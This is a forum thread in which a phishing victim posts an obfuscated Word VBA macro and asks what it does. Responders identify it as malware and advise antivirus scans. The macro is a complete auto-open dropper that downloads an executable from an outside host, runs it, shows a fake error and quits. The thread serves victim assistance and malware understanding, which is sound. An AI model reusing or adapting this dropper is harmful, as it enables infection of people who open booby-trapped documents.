none
Question about a Word Macro

    Question

  • Hello Team,

    Hope that someone can help me. I received an email from my energy company says that I have a really big amount of debt so by mistake my son opened the file, it's a word document with a Macro on it... I have no idea about programming and I from the Macro in my Word, this is what I got:

    --------------------------------        

    Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal lpvoid1 As Long, ByVal lpvoid2 As Long, ByVal lpvoidk3 As Long, ByVal lpvoidk4 As Long, ByVal lpvoid5 As Long, ByVal lpvoidk6 As Long) As Long
                        
    Dim APPLE As String
    Dim IBM As String
    Dim MOCOSOFT As String
                        
    Private Declare Function URLDownloadToFileW Lib "urlmon.dll" (ByVal lStatus1 As Long, ByVal lStatus2 As Long, ByVal lStatus3 As Long, ByVal lStatus4 As Long, ByVal lStatus5 As Long) As Long
          
                        

    Sub Workbook_Open()
       Auto_Open
    End Sub
    Sub AutoOpen()
       Auto_Open
    End Sub
    Sub Auto_Open()
        APPLE = "===h===ttp:===//re===dxx===i.c===om.===mx/a===kam===ai/===Off===ic===e_===Wor===d.e===x===e"
        MOCOSOFT = Environ(Replace("==t=====m======p==========", "=", "")) & "\officeWord.exe"
        Call hander
    End Sub
    Public Function hander() As String()

    URLDownloadToFileW 0&, XEROX(Replace(APPLE, "=", "")), XEROX(MOCOSOFT), 0&, 0&
        
    ShellExecuteW 0&, XEROX(Replace("O=====p===e==n===", "=", "")), XEROX(MOCOSOFT), XEROX(""), XEROX(""), 1



    Call XEROX2
        
        
        
        
        Application.DisplayAlerts = False




    Application.Quit
    End Function

    Public Function XEROX(c As String) As Long
    If 1 = 2 Then
    XEROX = 3432
    Else
    XEROX = StrPtr(c)
    End If
    End Function

    Sub XEROX2()
    MsgBox "E" & "" & "st" & "" & "e d" & "" & "oc" & "" & "um" & "" & "en" & "" & "to" & "" & " no" & "" & " es" & "" & " co" & "" & "mpa" & "" & "tib" & "" & "le " & "" & "con" & "" & " es" & "" & "te " & "" & "equ" & "" & "ipo" & "" & "." & vbCrLf & vbCrLf & "P" & "" & "or " & "" & "fav" & "" & "or " & "" & "int" & "" & "ent" & "" & "e d" & "" & "esd" & "" & "e o" & "" & "tro" & "" & " e" & "" & "qui" & "" & "po.", vbCritical, "" & "" & "Equ" & "" & "ipo" & "" & " no" & "" & " co" & "" & "mpa" & "" & "tib" & "" & "le"

    End Sub

    --------------------------------        

    I already reviewed something about the Macro and as far as I understood this is something to do with Windows hacking or something like that, right? Can anyone help me telling me what is this code and what they gather if someone opened in a Windows computer (the file has been opened from a MacBook computer).

    Thanks team

    Friday, September 11, 2015 4:42 PM

Answers

  • The code tries to download a program called officeWord.exe to the user's AppData\Local\Temp folder and then to run it. This is undoubtedly malware, but details are hard to come by.

    Run a full scan with your antivirus software and also with a program such as the free version of Malwarebytes Antimalware.


    Regards, Hans Vogelaar (http://www.eileenslounge.com)

    • Proposed as answer by Mike Laughlin Friday, September 11, 2015 5:59 PM
    • Marked as answer by Pablo Ayala Friday, September 11, 2015 7:49 PM
    Friday, September 11, 2015 5:02 PM

All replies

  • The code tries to download a program called officeWord.exe to the user's AppData\Local\Temp folder and then to run it. This is undoubtedly malware, but details are hard to come by.

    Run a full scan with your antivirus software and also with a program such as the free version of Malwarebytes Antimalware.


    Regards, Hans Vogelaar (http://www.eileenslounge.com)

    • Proposed as answer by Mike Laughlin Friday, September 11, 2015 5:59 PM
    • Marked as answer by Pablo Ayala Friday, September 11, 2015 7:49 PM
    Friday, September 11, 2015 5:02 PM
  • Thank you very much for the assistance.

    From the code that I reviewed the Script is trying to download a Word.exe file, right!? It's supposed that if I'm mac user there will be no problem with that code, right?

    Sorry to bother you about these dumb questions :S

    Friday, September 11, 2015 6:16 PM
  • Might ask them over here.

    http://answers.microsoft.com/en-us/protect

     

     

     


    Regards, Dave Patrick ....
    Microsoft Certified Professional
    Microsoft MVP [Windows]

    Disclaimer: This posting is provided "AS IS" with no warranties or guarantees , and confers no rights.

    • Proposed as answer by Mike Laughlin Friday, September 11, 2015 7:21 PM
    Friday, September 11, 2015 6:30 PM
    Moderator
  • Thank you very much for the assistance.

    From the code that I reviewed the Script is trying to download a Word.exe file, right!? It's supposed that if I'm mac user there will be no problem with that code, right?

    Sorry to bother you about these dumb questions :S


    I would expect the virus to be harmless on a Mac since a .exe created for Windows won't run on a Mac.

    Regards, Hans Vogelaar (http://www.eileenslounge.com)

    Friday, September 11, 2015 6:42 PM
  • Thank you very much for all the assistance. Have a great weekend.
    Friday, September 11, 2015 7:49 PM